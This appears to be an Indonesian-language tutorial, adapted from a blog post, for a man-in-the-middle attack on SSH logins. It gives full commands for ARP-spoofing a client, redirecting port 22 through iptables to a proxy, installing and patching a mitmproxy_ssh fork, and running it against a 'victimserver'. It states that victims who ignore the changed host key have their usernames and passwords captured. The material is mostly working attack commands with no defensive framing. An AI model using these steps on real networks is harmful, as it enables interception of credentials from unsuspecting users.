MITM: mitm ssh
sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
Diagram
client --> mitmproxy --> ssh server
- ip client: 192.168.0.106 (misalnya)
- ip server: 192.168.0.100 (misalnya)
ARPspoofing
ARP Spoof
sudo su arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null
Set firewall agar bisa NAT
sudo su sysctl -w net.ipv4.ip_forward=1 iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
Download
cd /root/ wget https://github.com/saironiq/mitmproxy/archive/master.zip unzip master.zip
Generate Keys
cd ~/mitmproxy-master/ ./mitmkeygen
key akan di simpan di
~/.mitmkeys/
Instal SSH key server yang akan di serang
Copykan:
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Contoh:
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100
Jalankan proxy
Jalankan proxy, arahkan ke victimserver.
cd ~/mitmproxy-master/ ./mitmproxy_ssh -H victimserver ./mitmproxy_ssh -H 192.168.0.100 -s
ini akan menjalankan proxy di localhost:2222
Harusnya bisa dilihat dengan
ssh localhost -p 2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
Instalasi
$ sudo pip install twisted $ sudo apt-get install python-service-identity $ pip install pycrypto
Jika Error
./mitmproxy_ssh -H 192.168.0.100 -s Server running on localhost:2222... Original client connected to proxy server. Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite why = selectable.doRead() File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead return self._dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived rval = self.protocol.dataReceived(data) File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage payload) File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet self.output += func(payload) File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init mpints, payload = get_mpint(payload) File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint mpints.append(Util.number.bytes_to_long( exceptions.AttributeError: 'module' object has no attribute 'number' Client disconnected.
Ini terjadi karena perubahan struktur pycrypto, ubah
- modify file mitmproxy/mitmproxy/sshdebug.py -- line 655 modify it to below mpints.append(cnumber.bytes_to_long(
-- line 11 add the following line from Crypto.Util import number as cnumber
update firewall
5- update ip_forward rule and nat
$ sudo sysctl -w net.ipv4.ip_forward=1 $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
6- run the mitmproxy_ssh and point to target server 192.168.202.124 $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124